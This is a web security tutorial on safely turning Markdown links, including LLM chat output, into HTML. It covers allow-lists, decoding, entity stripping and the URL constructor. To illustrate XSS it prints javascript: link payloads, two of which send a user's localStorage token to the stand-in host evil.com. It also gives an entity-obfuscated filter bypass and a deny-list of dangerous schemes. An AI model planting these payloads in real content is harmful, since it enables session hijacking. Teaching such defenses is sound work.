How to Parse URLs from Markdown to HTML Securely?

Initially, this might sound like a simple question: just use the built-in url module in Node.js to parse URLs, right? Or better yet, use the JavaScript URL object via new URL() and go from there to extract the parts you need but this might not be as easy as it seems.

Maybe? Let’s evaluate based on a real-world scenario that I’ve seen done in the wild. Referring specifically to Markdown based libraries.

Markdown to HTML

One of the most popular use-cases that require handling URL parsing is that of when you need to handle Markdown formatted content and render it on a web page, so it needs to be translated into its HTML equivalent.

Actually, this might sound even more popular to you than ever before, due to the rise of LLM (Large Language Models) and the requirement to achieve structured content that gets returned by these generative text models in the response payload and then you need to render them on the page.

To put that use-case example into practical terms, imagine you have the following React component that renders a chat-bot like interface on the page:

  return (
    <div className="mt-2 flex w-full flex-row items-start justify-start gap-3">
      <Flex
        ref={messageRef}
        direction="col"
        gap="lg"
        items="start"
        className="min-w-0 flex-grow pb-8"
      >
        <AISelectionProvider onSelect={handleSelection}>
          <Mdx
            message={rawAI ?? undefined}
            animate={!!isLoading}
            messageId={id}
          />
        </AISelectionProvider>
        {stop && (
          <AIMessageError
            stopReason={stopReason ?? undefined}
            message={message}
          />
        )}
        <AIMessageActions message={message} canRegenerate={message && isLast} />
        <AIRelatedQuestions message={message} show={message && isLast} />
      </Flex>
    </div>
  );

Practically, the messages are using a library like marked-react to convert the Markdown syntax from the LLM response into HTML as follows:

  return (
    <article className={articleClass} id={`message-${messageId}`}>
      <Markdown
        renderer={{
          text: (text) => text,
          paragraph: (children) => (
            <motion.p
              variants={REVEAL_ANIMATION_VARIANTS}
              animate={"visible"}
              initial={animate ? "hidden" : "visible"}
            >
              {children}
            </motion.p>
          ),
          em: renderEm,
          heading: renderHeading,
          hr: renderHr,
          br: renderBr,
          link: (href, text) => renderLink(href, text, messageId),
          image: renderImage,

          code: renderCode,
          codespan: renderCodespan,
        }}
        openLinksInNewTab={true}
      >
        {message}
      </Markdown>
    </article>
  );

Parsing Dangerous URLs from Markdown

Ok so we covered the use-case to provide an example of where and why you’ll often need to handle URL parsing from arbitrary strings, be it Markdown or otherwise.

Now imagine how the content from Markdown might look like:

[Click here to visit my website](https://lirantal.com)

Or maybe:

<a href="https://lirantal.com">Click here to visit my website</a>

So what stops someone from crafting a malicious URL that makes use of the javascript: protocol scheme to execute arbitrary JavaScript code, which is exactly how we get to Cross-site Scripting (XSS) vulnerabilities?

Imagine the following XSS payload:

[Click here to visit my website](javascript:alert('XSS'))

A markdown parser might naively turn the URL part word-to-word in terms of intent into the equivalent HTML anchor tag:

<a href="javascript:alert('XSS')">Click here to visit my website</a>

What’s in a JavaScript alert(‘XSS’) ?

Oh, right. This might not seem dangerous at first glance. What’s in an alert pop-up?

But if for example you use JWT to manage authentication and store them in local storage, then this type of an XSS attack can allow exfiltrating the JWT token and hijack the user’s session. Imagine the following:

[Click here to visit my website](javascript:fetch('https://evil.com?token=' + localStorage.getItem('token')))

I wish it was that easy, but it’s not. If you’ve been doing web development for a bit you probably got bitten by this little thing called CORS, which is the devil, but let’s not side-track. CORS is a browser’s security feature that prevents cross-origin requests (requests from one origin (domain) to another, sort of), so the above example won’t work as-is. So not really devil? more like your guardian angel 🪽.

Game not over though, we can come up with JavaScript code that would create an image tag and set the src attribute to the URL we want to exfiltrate the token to:

[Click here to visit my website](javascript:document.body.appendChild(document.createElement('img')).src='https://evil.com?token='+localStorage.getItem('token'))

Slick, eh? :-)

Anyways, I’m digressing here. But I do enjoy showing you and teaching you a bunch of web security tricks!

Parsing a URL in JavaScript

So back to the problem at hand. You get a markdown link element with a URL of javascript:alert() and now what? Well, maybe you pass it to new URL() or maybe you manually parse it with a regex pattern to ensure it doesn’t include invalid protocols like javascript:, right? So you’d have a snippet of code that looks like this:

const unsafeLinkPrefix = [
  'javascript:',
  'data:text/html',
  'vbscript:',
  'data:text/javascript',
  'data:text/vbscript',
  'data:text/css',
  'data:text/plain',
  'data:text/xml'
]

And then you’ll likely have a function that denies any URLs with those protocol schemes that can turn into an XSS attack. Congrats.

Insecure URL Parsing

But what if I told you that denying protocol schemes like that is not enough? 😲

Imagine user input, or a tricked LLM generated response that includes the following URL:

<a href="jav&#x09;ascript:alert('XSS');">Click Me</a>

This might look odd to you but the browser certainly knows how to interpret it. Your regex pattern matching logic will not catch this attack because it doesn’t strictly match the string “javascript”, right?

What does it do though? Let’s break it down. First of all, the text 	 is an HTML entity. Specifically this one, refers to the horizontal tab character. Each of these characters have a meaning:

& starts the entity reference.
# indicates a numeric character reference.
x09 is the hexadecimal Unicode code point for the tab character (equivalent to decimal 9).
; ends the entity reference.

Similarly, there are other payloads that utilize HTML entities to bypass bad regex patterns or just generally insecure pattern matching logic that would allow the URL to be kept as-is, and when it hits the DOM, the browser will easily interpret it as a JavaScript URL.

How to Securely Parse URLs from Markdown

At this point I think we’ve made the point about the dangers of parsing URLs. So to get on with the positive side of things, let’s talk about patterns and security best practices on how to properly and securely address the issue of URL parsing.

The following are built in specific ascending order of the practices you should follow to secure your URL parsing logic:

1. Allow-list vs Deny-list

Development paradigms such as maintaining the unsafeLinkPrefix array are a form of a deny-list and that’s often a bad pattern. The reason is that attackers will always come up with novel ways and new tricks to bypass your deny-list and you on the other hand have to keep up with it and maintain it. It’s a losing battle.

So, instead of having a deny-list that includes javascript: and any other protocols you deem dangerous, change perspectives. Work from an allow-list. What makes it reasonable for you to allow in a URL pattern for it to be valid in your use-cases?

For example, allow only the https: protocol.

2. Use secure anchor tags

When you render the URL as an anchor tag, you can utilize web standards that help enforce hardened security. For example, by default, render all these anchor HTML elements with the attributes rel="noopener noreferrer" and the target="_blank" attribute.

By doing that, the browser will open the URL in a new tab and will not allow the new tab to access the window.opener property, which is a common vector for phishing attacks.

3. Secure by default

This practice I specifically want to devote to library authors.

If you’re maintaining a library or a form of 3rd-party dependency that handles the parsing logic you might say that it is not your responsibility to decide whether URLs are opened in the same browsing tab or a new tab, or whether you should also support the ftp:// protocol scheme.

I get you.

But there’s a lot of value in providing a safe, hardened Secure by default approach that guarantees safe security defaults for the absolute majority of users and then building on top of it a way for consumers to opt-out of these safe defaults and change the behavior to allow for more flexibility. At that point, they hopefully consider the security implications of deviating from the default and then make an informed decision (hopefully 😅).

4. Decode URLs

URLs can be encoded in various ways. For example, the URL https://lirantal.com can be encoded as https%3A%2F%2Flirantal.com. Specifically though, that URL isn’t considered valid for the primary domain. However, since this is an article and I’ve no idea how you are intending to parse URLs then it is also possible that you may have a use-case in which you get URLs from a query string, like say https://example.com?redirect=https%3A%2F%2Flirantal.com and that’s where encoding and decoding URLs comes in handy.

So all that to say, your first step in parsing URLs is to first decode them so that you get a normalized URL representation that you can work with.

In technical terms it means:

const decodedUrl = decodeURIComponent(url);

5. Sanitize HTML entities and control characters

As we’ve seen in the example of the jav	ascript:alert('XSS'); URL, you should also take into account that URLs can be crafted with some payloads that you wouldn’t expect such as HTML entities.

Other characters might be employing some form of control characters that can be used to bypass your URL parsing logic.

The only way to handle these characters is to match them via string pattern matching (such as a regex) and remove them from the URL before you consider evaluating it.

Following is my recommendation for a practical and secure regular expression to match and remove HTML entities from a URL:

url = url.replace(/&#x([0-9a-f]+);?/gi, '')
         .replace(/&#(\d+);?/g, '')
         .replace(/&[a-z]+;?/gi, '')

Another variation of the above that you may consider is the following all-in-one regex:

url = url.replace(/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/g, '')

6. Use the URL parser

Finally, pass the URL to the new URL() function and handle error exceptions.

For example, even if you skip the previous step of sanitizing HTML entities and pass the URL as-is to the new URL() function, it will throw an error because the usage of HTML entities in a protocol scheme is invalid:

let exampleBad = 'jav&#10;ascript:alert(4)'
console.log(new URL(ret))

node:internal/url:806
    const href = bindingUrl.parse(input, base, raiseException);
                            ^

TypeError: Invalid URL
    at new URL (node:internal/url:806:29)

Still, you’d probably want to keep the URL sanitization logic in place and ensure you are also passing it over to the new URL() function to ensure it’s a valid URL and no errors are thrown.

If you do choose to make use of the URL() constructor web API then you probably want to approach this ordered practices list in a different order. Meaning, once you’ve decoded the URL, sanitized it and ran it through new URL() then you can apply the allow-list logic by checking the protocol scheme via the returned object’s url.protocol property.